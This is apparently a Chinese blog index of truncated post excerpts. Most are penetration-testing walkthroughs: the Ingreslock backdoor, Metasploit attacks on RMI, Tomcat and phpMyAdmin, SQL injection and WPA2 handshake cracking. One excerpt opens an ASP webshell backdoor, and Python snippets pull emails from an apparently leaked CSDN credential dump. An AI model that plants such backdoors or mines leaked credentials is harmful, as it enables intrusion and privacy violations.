原创 詞根詞綴

詞根     terr    恐怖     ory     地方    factory 工廠動詞後綴     ify

原创 Ingreslock後門漏洞

利用telnet命令連接目標主機的1524端口,直接獲取root權限。Ingreslock後門程序監聽在1524端口,連接到1524端口就可以直接獲得root權限, 經常被用於***一個暴露的服務器。 一、 利用nmap工具掃描目標主機1.

原创 數據提取郵箱

filepath=r"Z:\F\第一階段視頻\20170424\vedio\大數據相關數據\csdn.txt" file=open(filepath,"rb") savefilepath=r"C:\Users\Tsinghua-yin

原创 Ingreslock後門漏洞

利用telnet命令連接目標主機的1524端口,直接獲取root權限。Ingreslock後門程序監聽在1524端口,連接到1524端口就可以直接獲得root權限, 經常被用於***一個暴露的服務器。 一、 利用nmap工具掃描目標主機1.

原创 ******Web篇-SQL注入***初級

        不管用什麼語言編寫的Web應用,它們都用一個共同點,具有交互性並且多數是數據庫驅動。在網絡中,數據庫驅動的Web應用隨處可見,由此而存在的SQL注入是影響企業運營且最具破壞性的漏洞之一,這裏我想問,我們真的瞭解SQL注入嗎?

原创 Metasploit溢出java RMI SERVER命令執行漏洞

     利用java RMI SERVER命令執行漏洞,獲得目標主機root權限。     Java RMI Server的RMI註冊表和RMI激活服務的默認配置存在安全漏洞,可被利用導致代碼執行。一、利用nmap工具掃描目標主機1.1使

原创 Kali ***測試- 全主動信息收集-發現

╋━━━━━━━━━━━━━━━━━━━━━╋┃主動信息收集                              ┃┃無法避免留下訪問的痕跡                    ┃┃使用受控的第三方電腦進行探測          

原创 模塊七:web開發進階筆記

1、JS 正則 test - 判斷字符串是否符合規定的正則 rep = /\d+/; rep.test("asdfoiklfasdf89asdfasdf") # true rep = /^\d+$/;

原创 簡單給站點留後門

 <%if request.QueryString("action")="comeon" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):

原创 破解WPA2加密包實驗

    無線安全設置中,wpa2是目前應用最廣泛的加密認證方式。在加密和祕鑰管理過程中,均沒有明顯漏洞可利用。但是在實際中,依然存在針對wpa2的認證口令的***。目前針對wpa2的***方法,最主要的就是抓取用戶接入ap時,截獲hands

原创 Metasploit爆破tcpwrapped服務

一、利用nmap工具掃描目標主機1.1 使用nmap命令對目標主機進行掃描。1.2 在終端中輸入命令“nmap –sV  192.168.1.3”,對目標主機進行端口掃描,發現開放514端口,開放tcpwrapped服務。1.3 在終端中輸

原创 Metasploit溢出Tomcat管理臺默認口令漏洞

    利用Tomcat管理臺默認口令漏洞,上傳***文件,獲得目標主機webshell。    Tomcat 管理檯安裝好後需要及時修改默認管理賬戶,並杜絕弱口令,成功登陸者可以部署任意web應用,包括webshell。一、利用nmap工

原创 詞根詞綴

詞根     terr    恐怖     ory     地方    factory 工廠動詞後綴     ify

原创 CSDN字符串切割

linestr="456or123 # 15821 # [email protected]" mylist=linestr.split(" # ") #字符串切割。 print(mylist) #打印列表 print(mylist[2])

原创 Metasploit溢出phpMyAdmin漏洞

    利用phpMyAdmin漏洞上傳***程序,獲得webshell。    CGI腳本沒有正確處理請求參數,導致源代碼泄露,允許遠程***者在請求參數中插入執行命令。一、利用nmap工具掃描目標主機1.1使用nmap命令對目標主機進行